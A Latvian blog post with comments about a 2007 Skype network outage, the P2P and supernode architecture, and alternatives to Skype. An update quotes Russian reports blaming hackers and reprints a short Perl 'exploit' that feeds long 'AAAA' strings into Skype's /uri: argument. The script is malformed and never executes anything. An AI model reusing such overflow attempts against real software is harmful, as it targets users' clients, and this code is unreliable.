Skype problēmas (papildināts)

Vakar man bija problēmas pieslēgties Skype tīklā. Tā kā Skype tiek izmantots darba vajadzībām, tad ir diezgan būtiski, lai tas arī strādātu. Kolēģiem viss strādāja, jo viņi bija pieslēgušies agrāk. Nu neko – aizgāju uz lapu un novilku jaunāku versiju, cerēdams, ka tas kaut ko mainīs. Skujas. Izrādās, ka tās ir globālas Skype tīkla problēmas. Cilvēki vēl šodien ņemās. Daži nonāk līdz tam, ka pat piefiksē pa stundām, kas un kad notika. Šodien arī visu laiku brūk nost. Šī it kā esot pirmā reize, kad tik ilgi nestrādā tīkls. Iepriekšējo reizi esot bijušas problēmas 2004.gadā, kad bija problēmas ar DNS.
Redzot tās aktivitātes, kas notiek Latvijas blogos, es arī izdomāju ieskricelēt kaut ko. Bet nu nopietni – bizness brūk. Iedomājies, ja tev atbalsts tiek sniegts caur Skype tīklu un tagad pēkšņi tas nestrādā. Ko nu?

Skype it kā skaitās peer-to-peer tīkls jeb lietotājs-lietotājs, bet praksē, tomēr ir nepieciešams lietotājs-serveris-lietotājs. Rezultātā, ja serveris ir nepieejams, tad arī līdz lietotājam netiekam. Par šo tēmu jau 2003.gadā Skype forumos spriedelēja. Varbūt šis būs labs iemesls, lai pilnveidotu Skype un turpmāk varētu iztikt bez servera.

Papildināts

Pašķetināju pavedienu, ko iedeva jurisv un izlasīju par iespējamo hakeru skriptu ar kura palīdzību tiek grauti Skype serveri. Izklausās gan neticami.
Опубликован эксплоит для Skype
Skype out(of action)
Xakep.ru: Падение Skype было результатом действия российских хакеров

В ходе поиска локального переполнения буфера была обнаружена возможность послать длинную строку на сервер и переполнить его буфер, в результате чего он падает. Его место занимает другой сервер из P2P сети и так же на нем возникает ошибка и так далее. В результате за несколько часов вся сеть Skype пришла к отказу в обслуживании и команда разработчиков была вынуждена отключить аутентификацию.

Pats skripts, gan izskatās nekāds.

#!/usr/bin/perl
# Simle Code by Maranax Porex ;D
# Ya Skaypeg!!
for ($i=256; $i>xCCCCC; $i=$i+256){
$eot='AAAA' x $i;
call_sp();
}
exit;
sub call_sp(){
$str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\"";
}

30 thoughts on “Skype problēmas (papildināts)

 1. CooLynX Raksta autors

  AK, tā kā tas ir realizēts, piemēram, iekš eMule. Lietotājam ir savs draugu saraksts caur kuru pieslēdzies pie tīkla, sazvejo citus tādā pat veidā. Kaut kādi servisi var arī nestrādāt, bet man būtu jāvar pieslēgties tīklam un komunicēt ar citiem.

  Atbildēt
 2. jurisv

  Sekas varētu būt pakārotas – ja skype nevar autentificēties nevienā serverī tad arī nesaņem/nenosūta ziņojumus, lai arī varbūt joprojām redz kādu online.

  Atbildēt
 3. Utopia

  Šeit interesants raksts par skype tīkla darbības principiem: http://dirksmetric.wordpress.com/2007/08/16/anatomy-of-the-skype-network/

  Atbildēt
 4. purvainais

  Sybase> sidid admina necienīgs stils kautko restartēt , ja nestrādā ārējs servis.

  Ak laimīgais, viņam nekad nav nokāries rūteris (accespoints, vai da jebkas)! Tātad vēl viss priekšā!

  Atbildēt
 5. Sybase

  Sorry, man neienāca prātā ka runa iet par soho.
  Es patiešam atvainojos, nopietni.
  Man pirmā doma bija ka dzeks noliek mierā maršrutieri , ar 300kpps. (tādi joki ari redzēti)

  Atbildēt
 6. morāle

  jā bļin 😀 es tāpat kā viens iepriekš… ārī pārbūtoju visu ko vien var :)) un vilšanās…. būtu ātrāk iegājis skaipa lapā un izlasījis kas pa figņām

  Atbildēt
 7. Klaids

  Nezin gan vai pārāk gudri būtu sniegt atbalstu caur Skype… Īpaši skatoties uz to,ka šis serviss ir publisks – tātad iespējami traucējumi un drošības problēmas, kā laba alternatīva ir IBM “klucis” Sametime vai kāds bezmaksas čatiņš!

  Atbildēt
 8. RuleZ

  Nu man arī pilnīgas auzas ar Skype. Biju šīs programmas user no viņas parādīšanās brīža, bet ar tādām problēmām saskaros pirmo reizi. Man vēl šodien nekas neiet un jāsaka, ka bez skapja man iet grūti 🙁 Nu ko labs iemesls pārdomāt pāriet uz citiem risinājumiem. Nez kāpēc, kad grib dikti npelnīt un programmu sāk papildināt ar bizness un naudas pelnīšanas fīčām vienmēr kaut kas nobrūk. Mēģināju kačāt – jau 23MB svaru uzaudzējis. Neticami, neatceros cik skapis svēra sākumā, bet ja nemaldos tad kādus 4-6 MB

  Atbildēt
 9. kintu

  Bez autentikācijas servera jau neiztikt, bet izskatās, ka problēma bija kaut kur citur. Es domāju, ka Skype nogāza aizvērtā arhitektūra. Džeki bija sabūvējuši milzīgas p2p shēmas, bet vakar tas viss uzkārās. Bet neviena speciālista no malas konsultācijām nav iespējams, jo sistēmu pārzina tikai uz rokas pirkstiem saskaitāmi cilvēki pasaulē.

  Atbildēt
 10. kintu

  Palasīju nedaudz sīkāk, un, manuprāt, tas pierāda gluži pretējo, ka p2p nav drošs. Centrālo serveru drošība ir samērā labi apgūta – tos var dublēt, uztaisīt failover, utt. Un ja pat galīgi nobrūk, tad var nopirkt jaunu dzelzi, izvilkt backupus un atjaunot zināmā laika posmā. Ja nu vienīgi ēkai uzmet bumbu… Bet arī tas tikai teorētiski, jo backupus var viegli glabāt dažādās pasaules malās. Miljardus vērts uzņēmums to noteikti var atļauties.

  Bet Skype gadījumā izskatās, ka nobruka supermezgli (supernodes), no kuriem lielākā daļa nemaz nav Skype kontrolē. Skype noliedz, ka tas bija DDoS, bet ir norādes, ka tā bija pašas programmas radīta lavīnveida uzkāršanās. Iespējams, ka problēmas avots jau ir pašā Skype klientā, jo tā uz kādu brīdi tā nebija pieejama no Skype weblapas. Uzlika jaunu programmu serverim nav problēmu, bet nomainīt miljoniem klientu instalēto programmu… Mjā!

  Atbildēt
 11. kintu

  Man joprojām Skype logojas ārā un iekšā. Nav problēmu par čatošanu, bet škrobe, ka nevaru lietot arī SkypeIn un SkypeOut, kas tomēr ir maksas pakalpojumi. Ir uzlikts zvanu forwarding uz mobilo, taču problēma vienalga pastāv, jo zvans pārforvardējas, bet zvanītāja balsi es nedzirdu. Bet protams, par to visu maksa tiek paņemta.

  Atbildēt
 12. aiai

  Vispār, ja datoru neizslēdz, tad Skype var būt online ļoti ilgu laiku, bet citādi pa rokai viemēr vajag rezerves variantu… 😉

  Ja neiet Skype, ir tak vēl Google Talk, Yahoo(bremziigs gan) un arī Linuksam daži sarunu rīki.

  Atbildēt
 13. clueless

  Google Talk piedāvā kaut kādu multichat iespēju. http://labnol.blogspot.com/2007/08/conference-chat-in-google-talk-to.html

  Atbildēt
 14. budzis

  Ka jau te mineja, tad ir iespeja Gtalk izmantot grupveida chatoshanai. Un ir ari iespeja taisit balss konferencei. Biki “cerez ž…”, bet laikam var http://www.googlecommunity.com/about6666.html

  Atbildēt

Ieraksti komentāru

Tava e-pasta adrese netiks publicēta. Obligātie lauki ir atzīmēti kā *